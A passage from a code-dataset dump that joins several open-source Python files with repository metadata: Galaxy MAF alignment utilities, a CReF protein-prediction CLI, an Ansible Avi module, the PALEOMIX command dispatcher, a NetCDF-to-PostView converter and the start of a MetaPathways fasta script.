return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), None )
except:
return build_maf_index( maf_file, species = species )
#*** ANYCHANGE TO THIS METHOD HERE OR IN galaxy.datatypes.sequences MUST BE PROPAGATED ***
def build_maf_index_species_chromosomes( filename, index_species = None ):
species = []
species_chromosomes = {}
indexes = bx.interval_index_file.Indexes()
blocks = 0
try:
maf_reader = bx.align.maf.Reader( open( filename ) )
while True:
pos = maf_reader.file.tell()
block = maf_reader.next()
if block is None:
break
blocks += 1
for c in block.components:
spec = c.src
chrom = None
if "." in spec:
spec, chrom = spec.split( ".", 1 )
if spec not in species:
species.append( spec )
species_chromosomes[spec] = []
if chrom and chrom not in species_chromosomes[spec]:
species_chromosomes[spec].append( chrom )
if index_species is None or spec in index_species:
forward_strand_start = c.forward_strand_start
forward_strand_end = c.forward_strand_end
try:
forward_strand_start = int( forward_strand_start )
forward_strand_end = int( forward_strand_end )
except ValueError:
continue #start and end are not integers, can't add component to index, goto next component
#this likely only occurs when parse_e_rows is True?
#could a species exist as only e rows? should the
if forward_strand_end > forward_strand_start:
#require positive length; i.e. certain lines have start = end = 0 and cannot be indexed
indexes.add( c.src, forward_strand_start, forward_strand_end, pos, max=c.src_size )
except Exception, e:
#most likely a bad MAF
log.debug( 'Building MAF index on %s failed: %s' % ( filename, e ) )
return ( None, [], {} )
return ( indexes, species, species_chromosomes, blocks )
#builds and returns ( index, index_filename ) for specified maf_file
def build_maf_index( maf_file, species = None ):
indexes, found_species, species_chromosomes, blocks = build_maf_index_species_chromosomes( maf_file, species )
if indexes is not None:
fd, index_filename = tempfile.mkstemp()
out = os.fdopen( fd, 'w' )
indexes.write( out )
out.close()
return ( bx.align.maf.Indexed( maf_file, index_filename = index_filename, keep_open = True, parse_e_rows = False ), index_filename )
return ( None, None )
def component_overlaps_region( c, region ):
if c is None: return False
start, end = c.get_forward_strand_start(), c.get_forward_strand_end()
if region.start >= end or region.end <= start:
return False
return True
def chop_block_by_region( block, src, region, species = None, mincols = 0 ):
# This chopping method was designed to maintain consistency with how start/end padding gaps have been working in Galaxy thus far:
# behavior as seen when forcing blocks to be '+' relative to src sequence (ref) and using block.slice_by_component( ref, slice_start, slice_end )
# whether-or-not this is the 'correct' behavior is questionable, but this will at least maintain consistency
# comments welcome
slice_start = block.text_size #max for the min()
slice_end = 0 #min for the max()
old_score = block.score #save old score for later use
# We no longer assume only one occurance of src per block, so we need to check them all
for c in iter_components_by_src( block, src ):
if component_overlaps_region( c, region ):
if c.text is not None:
rev_strand = False
if c.strand == "-":
#We want our coord_to_col coordinates to be returned from positive stranded component
rev_strand = True
c = c.reverse_complement()
start = max( region.start, c.start )
end = min( region.end, c.end )
start = c.coord_to_col( start )
end = c.coord_to_col( end )
if rev_strand:
#need to orient slice coordinates to the original block direction
slice_len = end - start
end = len( c.text ) - start
start = end - slice_len
slice_start = min( start, slice_start )
slice_end = max( end, slice_end )
if slice_start < slice_end:
block = block.slice( slice_start, slice_end )
if block.text_size > mincols:
# restore old score, may not be accurate, but it is better than 0 for everything?
block.score = old_score
if species is not None:
block = block.limit_to_species( species )
block.remove_all_gap_columns()
return block
return None
def orient_block_by_region( block, src, region, force_strand = None ):
#loop through components matching src,
#make sure each of these components overlap region
#cache strand for each of overlaping regions
#if force_strand / region.strand not in strand cache, reverse complement
### we could have 2 sequences with same src, overlapping region, on different strands, this would cause no reverse_complementing
strands = [ c.strand for c in iter_components_by_src( block, src ) if component_overlaps_region( c, region ) ]
if strands and ( force_strand is None and region.strand not in strands ) or ( force_strand is not None and force_strand not in strands ):
block = block.reverse_complement()
return block
def get_oriented_chopped_blocks_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols, force_strand ):
yield block
def get_oriented_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0, force_strand = None ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield orient_block_by_region( block, src, region, force_strand ), idx, offset
#split a block with multiple occurances of src into one block per src
def iter_blocks_split_by_src( block, src ):
for src_c in iter_components_by_src( block, src ):
new_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) )
new_block.text_size = block.text_size
for c in block.components:
if c == src_c or c.src != src:
new_block.add_component( deepcopy( c ) ) #components have reference to alignment, dont want to loose reference to original alignment block in original components
yield new_block
#split a block into multiple blocks with all combinations of a species appearing only once per block
def iter_blocks_split_by_species( block, species = None ):
def __split_components_by_species( components_by_species, new_block ):
if components_by_species:
#more species with components to add to this block
components_by_species = deepcopy( components_by_species )
spec_comps = components_by_species.pop( 0 )
for c in spec_comps:
newer_block = deepcopy( new_block )
newer_block.add_component( deepcopy( c ) )
for value in __split_components_by_species( components_by_species, newer_block ):
yield value
else:
#no more components to add, yield this block
yield new_block
#divide components by species
spec_dict = {}
if not species:
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in spec_dict:
spec_dict[ spec ] = []
species.append( spec )
spec_dict[ spec ].append( c )
else:
for spec in species:
spec_dict[ spec ] = []
for c in iter_components_by_src_start( block, spec ):
spec_dict[ spec ].append( c )
empty_block = bx.align.Alignment( score=block.score, attributes=deepcopy( block.attributes ) ) #should we copy attributes?
empty_block.text_size = block.text_size
#call recursive function to split into each combo of spec/blocks
for value in __split_components_by_species( spec_dict.values(), empty_block ):
sort_block_components_by_block( value, block ) #restore original component order
yield value
#generator yielding only chopped and valid blocks for a specified region
def get_chopped_blocks_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in get_chopped_blocks_with_index_offset_for_region( index, src, region, species, mincols ):
yield block
def get_chopped_blocks_with_index_offset_for_region( index, src, region, species = None, mincols = 0 ):
for block, idx, offset in index.get_as_iterator_with_index_and_offset( src, region.start, region.end ):
block = chop_block_by_region( block, src, region, species, mincols )
if block is not None:
yield block, idx, offset
#returns a filled region alignment for specified regions
def get_region_alignment( index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
if species is not None: alignment = RegionAlignment( end - start, species )
else: alignment = RegionAlignment( end - start, primary_species )
return fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand, species, mincols, overwrite_with_gaps )
#reduces a block to only positions exisiting in the src provided
def reduce_block_by_primary_genome( block, species, chromosome, region_start ):
#returns ( startIndex, {species:texts}
#where texts' contents are reduced to only positions existing in the primary genome
src = "%s.%s" % ( species, chromosome )
ref = block.get_component_by_src( src )
start_offset = ref.start - region_start
species_texts = {}
for c in block.components:
species_texts[ c.src.split( '.' )[0] ] = list( c.text )
#remove locations which are gaps in the primary species, starting from the downstream end
for i in range( len( species_texts[ species ] ) - 1, -1, -1 ):
if species_texts[ species ][i] == '-':
for text in species_texts.values():
text.pop( i )
for spec, text in species_texts.items():
species_texts[spec] = ''.join( text )
return ( start_offset, species_texts )
#fills a region alignment
def fill_region_alignment( alignment, index, primary_species, chrom, start, end, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
region = bx.intervals.Interval( start, end )
region.chrom = chrom
region.strand = strand
primary_src = "%s.%s" % ( primary_species, chrom )
#Order blocks overlaping this position by score, lowest first
blocks = []
for block, idx, offset in index.get_as_iterator_with_index_and_offset( primary_src, start, end ):
score = float( block.score )
for i in range( 0, len( blocks ) ):
if score < blocks[i][0]:
blocks.insert( i, ( score, idx, offset ) )
break
else:
blocks.append( ( score, idx, offset ) )
#gap_chars_tuple = tuple( GAP_CHARS )
gap_chars_str = ''.join( GAP_CHARS )
#Loop through ordered blocks and layer by increasing score
for block_dict in blocks:
for block in iter_blocks_split_by_species( block_dict[1].get_at_offset( block_dict[2] ) ): #need to handle each occurance of sequence in block seperately
if component_overlaps_region( block.get_component_by_src( primary_src ), region ):
block = chop_block_by_region( block, primary_src, region, species, mincols ) #chop block
block = orient_block_by_region( block, primary_src, region ) #orient block
start_offset, species_texts = reduce_block_by_primary_genome( block, primary_species, chrom, start )
for spec, text in species_texts.items():
#we should trim gaps from both sides, since these are not positions in this species genome (sequence)
text = text.rstrip( gap_chars_str )
gap_offset = 0
while True in [ text.startswith( gap_char ) for gap_char in GAP_CHARS ]: #python2.4 doesn't accept a tuple for .startswith()
#while text.startswith( gap_chars_tuple ):
gap_offset += 1
text = text[1:]
if not text:
break
if text:
if overwrite_with_gaps:
alignment.set_range( start_offset + gap_offset, spec, text )
else:
for i, char in enumerate( text ):
if char not in GAP_CHARS:
alignment.set_position( start_offset + gap_offset + i, spec, char )
return alignment
#returns a filled spliced region alignment for specified region with start and end lists
def get_spliced_region_alignment( index, primary_species, chrom, starts, ends, strand = '+', species = None, mincols = 0, overwrite_with_gaps = True ):
#create spliced alignment object
if species is not None: alignment = SplicedAlignment( starts, ends, species )
else: alignment = SplicedAlignment( starts, ends, [primary_species] )
for exon in alignment.exons:
fill_region_alignment( exon, index, primary_species, chrom, exon.start, exon.end, strand, species, mincols, overwrite_with_gaps )
return alignment
#loop through string array, only return non-commented lines
def line_enumerator( lines, comment_start = '#' ):
i = 0
for line in lines:
if not line.startswith( comment_start ):
i += 1
yield ( i, line )
#read a GeneBed file, return list of starts, ends, raw fields
def get_starts_ends_fields_from_gene_bed( line ):
#Starts and ends for exons
starts = []
ends = []
fields = line.split()
#Requires atleast 12 BED columns
if len(fields) < 12:
raise Exception( "Not a proper 12 column BED line (%s)." % line )
chrom = fields[0]
tx_start = int( fields[1] )
tx_end = int( fields[2] )
name = fields[3]
strand = fields[5]
if strand != '-': strand='+' #Default strand is +
cds_start = int( fields[6] )
cds_end = int( fields[7] )
#Calculate and store starts and ends of coding exons
region_start, region_end = cds_start, cds_end
exon_starts = map( int, fields[11].rstrip( ',\n' ).split( ',' ) )
exon_starts = map( ( lambda x: x + tx_start ), exon_starts )
exon_ends = map( int, fields[10].rstrip( ',' ).split( ',' ) )
exon_ends = map( ( lambda x, y: x + y ), exon_starts, exon_ends );
for start, end in zip( exon_starts, exon_ends ):
start = max( start, region_start )
end = min( end, region_end )
if start < end:
starts.append( start )
ends.append( end )
return ( starts, ends, fields )
def iter_components_by_src( block, src ):
for c in block.components:
if c.src == src:
yield c
def get_components_by_src( block, src ):
return [ value for value in iter_components_by_src( block, src ) ]
def iter_components_by_src_start( block, src ):
for c in block.components:
if c.src.startswith( src ):
yield c
def get_components_by_src_start( block, src ):
return [ value for value in iter_components_by_src_start( block, src ) ]
def sort_block_components_by_block( block1, block2 ):
#orders the components in block1 by the index of the component in block2
#block1 must be a subset of block2
#occurs in-place
return block1.components.sort( cmp = lambda x, y: block2.components.index( x ) - block2.components.index( y ) )
def get_species_in_maf( maf_filename ):
species = []
for block in bx.align.maf.Reader( open( maf_filename ) ):
for spec in get_species_in_block( block ):
if spec not in species:
species.append( spec )
return species
def parse_species_option( species ):
if species:
species = species.split( ',' )
if 'None' not in species:
return species
return None #provided species was '', None, or had 'None' in it
def remove_temp_index_file( index_filename ):
try: os.unlink( index_filename )
except: pass
#Below are methods to deal with FASTA files
def get_fasta_header( component, attributes = {}, suffix = None ):
header = ">%s(%s):%i-%i|" % ( component.src, component.strand, component.get_forward_strand_start(), component.get_forward_strand_end() )
for key, value in attributes.iteritems():
header = "%s%s=%s|" % ( header, key, value )
if suffix:
header = "%s%s" % ( header, suffix )
else:
header = "%s%s" % ( header, src_split( component.src )[ 0 ] )
return header
def get_attributes_from_fasta_header( header ):
if not header: return {}
attributes = {}
header = header.lstrip( '>' )
header = header.strip()
fields = header.split( '|' )
try:
region = fields[0]
region = region.split( '(', 1 )
temp = region[0].split( '.', 1 )
attributes['species'] = temp[0]
if len( temp ) == 2:
attributes['chrom'] = temp[1]
else:
attributes['chrom'] = temp[0]
region = region[1].split( ')', 1 )
attributes['strand'] = region[0]
region = region[1].lstrip( ':' ).split( '-' )
attributes['start'] = int( region[0] )
attributes['end'] = int( region[1] )
except:
#fields 0 is not a region coordinate
pass
if len( fields ) > 2:
for i in xrange( 1, len( fields ) - 1 ):
prop = fields[i].split( '=', 1 )
if len( prop ) == 2:
attributes[ prop[0] ] = prop[1]
if len( fields ) > 1:
attributes['__suffix__'] = fields[-1]
return attributes
def iter_fasta_alignment( filename ):
class fastaComponent:
def __init__( self, species, text = "" ):
self.species = species
self.text = text
def extend( self, text ):
self.text = self.text + text.replace( '\n', '' ).replace( '\r', '' ).strip()
#yields a list of fastaComponents for a FASTA file
f = open( filename, 'rb' )
components = []
#cur_component = None
while True:
line = f.readline()
if not line:
if components:
yield components
return
line = line.strip()
if not line:
if components:
yield components
components = []
elif line.startswith( '>' ):
attributes = get_attributes_from_fasta_header( line )
components.append( fastaComponent( attributes['species'] ) )
elif components:
components[-1].extend( line )
|
volpino/Yeps-EURAC
|
lib/galaxy/tools/util/maf_utilities.py
|
Python
|
mit
| 27,158
|
[
"Galaxy"
] |
348f1820f9e02b492e1b53b3f7e72259fed413610ae0c4c3da96659162513f1a
|
#!/usr/bin/env python
import os
import argparse
import logging
import importlib
import tempfile
import subprocess
import pandas
from Bio import SeqIO
from cref.app import BaseApp
from cref.libs import rcsb
logger = logging.getLogger('CReF')
class TerminalApp(BaseApp):
"""
App to be run on the terminal
"""
def reporter(self, state):
pass
def run_cref(aa_sequence, output_dir, params):
pandas.set_option('display.max_columns', 0)
pandas.set_option('display.max_rows', 5)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
app = TerminalApp(params)
return app.run(aa_sequence, output_dir)
def configure_logger(log_level='INFO', include_pathname=False):
logger = logging.getLogger('CReF')
level = getattr(logging, log_level.upper(), None)
if not isinstance(level, int):
raise ValueError('Invalid log level: %s' % log_level)
logger.propagate = False
logger = logging.getLogger('CReF')
logger.setLevel(level)
ch = logging.StreamHandler()
ch.setLevel(level)
if include_pathname:
template = ('%(asctime)s - %(name)s - %(levelname)s'
'(%(pathname)s, %(lineno)d)- %(message)s')
else:
template = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
formatter = logging.Formatter(template, datefmt='%d/%m/%Y %I:%M:%S %p')
ch.setFormatter(formatter)
logger.addHandler(ch)
def parse_args():
parser = argparse.ArgumentParser(
description='CReF: Protein structure prediction')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
'--sequence', dest='sequence',
help='Aminoacid sequence using one letter code',
)
group.add_argument(
'--fasta', dest='fasta',
help='File containing the fasta sequence',
)
group.add_argument(
'--pdb', dest='pdb',
help='PDB Code from where the sequence will be extracted',
)
parser.add_argument(
'--config', dest='config',
help='File specifying the configurations'
)
parser.add_argument(
'--output', dest='output_dir',
default='predictions/tmp',
help='Directory to save the results'
)
parser.add_argument(
'--log', dest='log_level',
default='INFO',
help='Log level to be used (DEBUG, INFO, WARN, ERROR)'
)
parser.add_argument(
'--pymol', dest='pymol', action='store_true',
help='View prediction in PyMOL'
)
return parser.parse_args()
def read_fasta(filepath):
records = []
with open(filepath, 'rU') as fasta_file:
records = list(SeqIO.parse(fasta_file, 'fasta'))
return records
def predict_fasta(filepath, output_dir, params):
sequences = read_fasta(filepath)
output_filepaths = []
for sequence in sequences:
seq = str(sequence.seq).replace('X', '')
output_dir = os.path.join(output_dir, sequence.id.split(':')[0] + '/')
output = run_cref(seq, output_dir, params)
sequence_file = os.path.join(output_dir, 'sequence.txt')
with open(sequence_file, 'w') as sequence_output:
sequence_output.write(seq)
output_filepaths.append(output)
return output_filepaths
def read_config(module):
try:
config = importlib.import_module(module)
except Exception as e:
logger.error(e)
raise Exception('Invalid config file')
return config
def run_pymol(pdb_code, predicted_filepath):
filepath = os.path.join(
os.path.dirname(predicted_filepath),
'experimental_structure.pdb'
)
experimental_pdb = rcsb.download_pdb(pdb_code, filepath)
subprocess.call([
'pymol',
predicted_filepath,
experimental_pdb,
'-r',
'cref/utils/pymol.py'
])
def main():
params = {}
args = parse_args()
configure_logger(args.log_level)
if args.config:
config = read_config(args.config)
params = config.params
# Sequence input
if args.sequence:
run_cref(args.sequence, args.output_dir, params)
# Fasta file input
elif args.fasta:
predict_fasta(args.fasta, args.output_dir, params)
# PDB code input
elif args.pdb:
handler, fasta_file = tempfile.mkstemp(suffix='.fasta', prefix='tmp')
rcsb.download_fasta(args.pdb, fasta_file)
params['pdb'] = args.pdb
output_files = predict_fasta(fasta_file, args.output_dir, params)
os.remove(fasta_file)
if args.pymol:
run_pymol(args.pdb, output_files[0])
else:
raise ValueError('You must specify a sequence, fasta file or pdb code')
if __name__ == '__main__':
main()
|
mchelem/cref2
|
cref/app/terminal.py
|
Python
|
mit
| 4,737
|
[
"PyMOL"
] |
186f38ec15ade06b82bcc6ac837bf46e22481607cd669bffcdcd8b3632ae10c0
|
#!/usr/bin/python
#
# Created on Aug 25, 2016
# @author: Gaurav Rastogi (grastogi@avinetworks.com)
# Eric Anderson (eanderson@avinetworks.com)
# module_check: supported
#
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: avi_microservicegroup
author: Gaurav Rastogi (grastogi@avinetworks.com)
short_description: Module for setup of MicroServiceGroup Avi RESTful Object
description:
- This module is used to configure MicroServiceGroup object
- more examples at U(https://github.com/avinetworks/devops)
requirements: [ avisdk ]
version_added: "2.4"
options:
state:
description:
- The state that should be applied on the entity.
default: present
choices: ["absent","present"]
created_by:
description:
- Creator name.
description:
description:
- User defined description for the object.
name:
description:
- Name of the microservice group.
required: true
service_refs:
description:
- Configure microservice(es).
- It is a reference to an object of type microservice.
tenant_ref:
description:
- It is a reference to an object of type tenant.
url:
description:
- Avi controller URL of the object.
uuid:
description:
- Uuid of the microservice group.
extends_documentation_fragment:
- avi
'''
EXAMPLES = '''
- name: Create a Microservice Group that can be used for setting up Network security policy
avi_microservicegroup:
controller: ''
username: ''
password: ''
description: Group created by my Secure My App UI.
name: vs-msg-marketing
tenant_ref: admin
'''
RETURN = '''
obj:
description: MicroServiceGroup (api/microservicegroup) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
created_by=dict(type='str',),
description=dict(type='str',),
name=dict(type='str', required=True),
service_refs=dict(type='list',),
tenant_ref=dict(type='str',),
url=dict(type='str',),
uuid=dict(type='str',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'microservicegroup',
set([]))
if __name__ == '__main__':
main()
|
Azulinho/ansible
|
lib/ansible/modules/network/avi/avi_microservicegroup.py
|
Python
|
gpl-3.0
| 3,753
|
[
"VisIt"
] |
504d92c0d4ef423c197c1773d61216dc79dc53388bea664c9f56fbd622f11ba7
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sys
import pysam
import paleomix
import paleomix.common.system
import paleomix.common.logging
_COMMANDS = {
# CMBR NGS pipeline
"ngs": "paleomix.pipelines.ngs",
"ngs:finalize_bam": "paleomix.pipelines.ngs.tools.finalize_bam",
# BAM/FASTQ pipeline
"bam": "paleomix.pipelines.bam.main",
"bam_pipeline": "paleomix.pipelines.bam.main",
"trim": "paleomix.pipelines.bam.trim_pipeline",
"trim_pipeline": "paleomix.pipelines.bam.trim_pipeline",
"worker": "paleomix.tools.worker",
# Phylogenetic pipeline
"phylo": "paleomix.pipelines.phylo.pipeline",
"phylo_pipeline": "paleomix.pipelines.phylo.pipeline",
# Zonkey
"zonkey": "paleomix.pipelines.zonkey.pipeline",
"zonkey:db": "paleomix.pipelines.zonkey.build_db",
"zonkey:mito": "paleomix.pipelines.zonkey.build_mito",
"zonkey:tped": "paleomix.pipelines.zonkey.build_tped",
# BAM file tools
"cleanup": "paleomix.tools.cleanup",
"coverage": "paleomix.tools.coverage",
"depths": "paleomix.tools.depths",
"dupcheck": "paleomix.tools.dupcheck",
# VCF/etc. tools
"rmdup_collapsed": "paleomix.tools.rmdup_collapsed",
"vcf_filter": "paleomix.tools.vcf_filter",
"vcf_to_fasta": "paleomix.tools.vcf_to_fasta",
# Misc tools
":bedtools": "paleomix.tools.bedtools",
":validate_fastq": "paleomix.tools.validate_fastq",
":validate_fasta": "paleomix.tools.validate_fasta",
}
_HELP = """PALEOMIX - pipelines and tools for NGS data analyses
Version: {version}
Pipelines:
paleomix bam -- Pipeline for trimming and mapping of NGS reads.
paleomix trim -- Equivalent to the 'bam' pipeline, but only runs
the FASTQ trimming steps.
paleomix phylo -- Pipeline for genotyping and phylogenetic
inference from BAMs.
paleomix zonkey -- Pipeline for detecting F1 (equine) hybrids.
paleomix worker -- Distribute pipelines across multiple systems.
BAM/SAM tools:
paleomix coverage -- Calculate coverage across reference sequences
or regions of interest.
paleomix depths -- Calculate depth histograms across reference
sequences or regions of interest.
paleomix rmdup_collapsed -- Filters PCR duplicates for collapsed paired-
ended reads generated by the AdapterRemoval
tool.
VCF/GTF/BED/Pileup tools:
paleomix vcf_filter -- Quality filters for VCF records, similar to
'vcfutils.pl varFilter'.
paleomix vcf_to_fasta -- Create most likely FASTA sequence from tabix-
indexed VCF file.
If you make use of PALEOMIX in your work, please cite
Schubert et al, "Characterization of ancient and modern genomes by SNP
detection and phylogenomic and metagenomic analysis using PALEOMIX".
Nature Protocols. 2014 May; 9(5): 1056-82. doi: 10.1038/nprot.2014.063
"""
def main(argv):
# Change process name from 'python' to 'paleomix'
paleomix.common.system.set_procname("paleomix " + " ".join(argv[:1]))
# Setup basic logging to STDERR
paleomix.common.logging.initialize_console_logging()
# Silence log-messages from HTSLIB
pysam.set_verbosity(0)
if not argv or argv[0] in ("-h", "--help", "help"):
print(_HELP.format(version=paleomix.__version__))
return 0
elif argv[0] in ("--version",):
print("paleomix v{}".format(paleomix.__version__))
return 0
command = _COMMANDS.get(argv[0])
if command is None:
log = logging.getLogger(__name__)
log.error("Unknown command %r", argv[0])
return 1
module = __import__(command, fromlist=["main"])
return module.main(argv[1:])
def entry_point():
return main(sys.argv[1:])
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
MikkelSchubert/paleomix
|
paleomix/main.py
|
Python
|
mit
| 5,185
|
[
"pysam"
] |
9ba7395cc04df74cd57859e6155eaab23a98ba01e317a88e3b8d669d6ff6ef68
|
"""
Generates a PostView file from a .nc file. The three methods are for three of the
types of coordinate system used in NetCDFs: lat-lon, x-y, and x/y start/stop with x/y step.
"""
import os
from numpy import *
from time import gmtime, strftime, clock
import datetime
from Scientific.IO import NetCDF
class UnsuportedRasterVariableError(Exception):
def __init__(self, variableNames):
print 'file Variables', variableNames, 'not supported'
class converter(): #appears to be writing pos files correctly
def wholeDirect( self, direc ):
posTime = datetime.datetime.now()
print 'Started :'+str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
ncfiles = os.popen("echo "+str(direc)+'*.nc').read().split()
for f in ncfiles:
self.singleNetCDFLayerFileName = f
self.postviewFileName = f[:-2]+'pos'
print self.singleNetCDFLayerFileName
print str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
try:#note not the most efficient way of calling this
self.writePosFile()
except :
print 'Failed to write'
continue
print "done :" + str(strftime("%Y-%m-%d %H:%M:%S", gmtime()))
timePassed = datetime.datetime.now() - posTime
print "Time :" + str(timePassed.seconds) + " seconds."
# Lon-lat.
def _read_nc( self ):
lon = self.fnc.variables['lon'][:]
lat = self.fnc.variables['lat'][:]
field = self.fnc.variables['z'][:, :]
field = abs(where(field == 0, 0.1, field))
self.x0 = outer(ones_like(lat),lon).flatten()#may not be the most efficient way of calling this
self.x1 = outer(lat, ones_like(lon)).flatten()
self.phi = field.flatten()
# X/Y range.
def _read_nc_xyrange( self ): #still does not seem to be working
xs = self.fnc.variables['x_range']
ys = self.fnc.variables['y_range']
space = self.fnc.variables['dimension']
field = self.fnc.variables['z']
field = abs(where(field == 0, 0.1, field))
xList = linspace(xs[0], xs[1], space[0])
yList = linspace(ys[0], ys[1], space[1])
self.x0 = outer(ones_like(yList),xList).flatten()
self.x1 = outer(yList, ones_like(xList)).transpose().flatten()
self.phi = field
# X-Y.
def _read_nc_xy( self ):
x = self.fnc.variables['x'][:]
y = self.fnc.variables['y'][:]
field = self.fnc.variables['z'][:, :]
field = abs(where(field == 0, 0.1, field))
self.x0 = outer(ones_like(y),x).flatten()
self.x1 = outer(y, ones_like(x)).flatten()
self.phi = field.flatten()
def _writeFunc( self ):
f = open(str(self.postviewFileName),'w')
f.write("""View "background_edgelength" {\n""")
self._writeLines(f,self.x0,self.x1,self.phi)
f.write('};')
f.close()
_writeLines = vectorize(lambda f, x, y, z: f.write("SP("+str(x)+","+str(y)+",0){"+str(z)+"};\n"))
def writePosFile( self ): #find some algarithm to decide what to return for the 0 value
print "Writing PostView File..."
# Check the file variables so that the appropriate function can be called.
self.fnc = NetCDF.NetCDFFile(str(self.singleNetCDFLayerFileName), 'r')
variableNames = self.fnc.variables.keys()
if 'lon' in variableNames:
self._read_nc()
elif 'x_range' in variableNames:
self._read_nc_xyrange()
elif 'x' in variableNames:
self._read_nc_xy()
else:
raise UnsuportedRasterVariableError(str(variableNames))
self._writeFunc()
print "PostView File Written."
if __name__ == '__main__':
import sys
if len(sys.argv) == 1:
arg = os.path.realpath(__name__)[:-8]
else:
arg = sys.argv[1]
converter().wholeDirect(str(arg))
|
janhui/test_engine
|
dev/StandAloneScripts/PosFileConverter.py
|
Python
|
lgpl-2.1
| 3,478
|
[
"NetCDF"
] |
f3a715437643bdb53ee928b4d9081400d5974dae0c8026a1612b8180378dae8c
|
#!/usr/bin/python
# File created on 27 Jan 2012.
from __future__ import division
__author__ = "Kishori M Konwar"
__copyright__ = "Copyright 2013, MetaPathways"
__credits__ = ["r"]
__version__ = "1.0"
__maintainer__ = "Kishori M Konwar"
__status__ = "Release"
try:
import os, re, traceback
from os import makedirs, sys, remove, rename
from sys import path
from optparse import OptionParser
from libs.python_modules.utils.metapathways_utils import parse_command_line_parameters, fprintf, ShortenORFId
from libs.python_modules.utils.sysutil import getstatusoutput, pathDelim
from libs.python_modules.utils.errorcodes import error_message, get_error_list, insert_error
except:
print(""" Could not load some user defined module functions""")
print(""" Make sure your typed 'source MetaPathwaysrc'""")
print(""" """)
sys.exit(3)
PATHDELIM = pathDelim()
usage = __file__ + """ -i input_fasta_file -o output_file """
parser = None
def createParser():
global parser
epilog = """The amino acid sequences in the orf_prediction folder are used to do a self alignment, which will be used to compute the bit score ratio (BSR) for the hits. The BSR ratio can be defined at the ratio of a the bit-score between a query and a target sequence to the bitcore when both the query and target sequenes are the query sequence. Usually, a BSR ratio of 0.4 or more is considered as a good hit for protein sequences. Note that BSR ratio is designed in some sense to have a normalized value for the bit-score since the score is also influenced by the length of the query.
The results are written to a file (usually in a folder called blast_results in the MetaPathway pipeline, into a file named <samplename>.refscore.<algorithm> (where <algorithm> refers to the BLAST or LAST in the context of the pipeline) extension This script can be extended to add other sequence homology search algorithms."""
epilog = re.sub(r'[ \t\f\v]+',' ', epilog)
parser = OptionParser(usage=usage, epilog=epilog)
parser.add_option("-i", "--input_file", dest="input_fasta",
help='the input fasta file [REQUIRED]')
parser.add_option("-o", "--output_file", dest="output_file",
help='the output fasta file [REQUIRED]')
parser.add_option("-a", "--algorithm", dest="algorithm", choices = ['BLAST', 'LAST'], default = "BLAST",
help='the algorithm used for computing homology [DEFAULT: BLAST]')
parser.add_option( "--compact_output", dest="compact_output", action='store_true', default=False,
help='compact output [OPTIONAL]')
def check_arguments(opts, args):
if opts.input_fasta == None or opts.output_file == None:
return True
else:
return False
class FastaRecord(object):
def __init__(self, name, sequence):
self.name = name
self.sequence = sequence
# return FastaRecord(title, sequence)
class FastaReader():
"""Parses a fasta record from a string or file."""
stop = False
START_PATTERN = re.compile(r'^>')
name = None
future_name =None
sequence=""
def __init__(self, fasta_filename):
try:
self.file = open(fasta_filename, 'r')
except IOError:
print("Cannot open fasta file " + fasta_filename)
def __iter__(self):
return self
def close(self):
self.file.close()
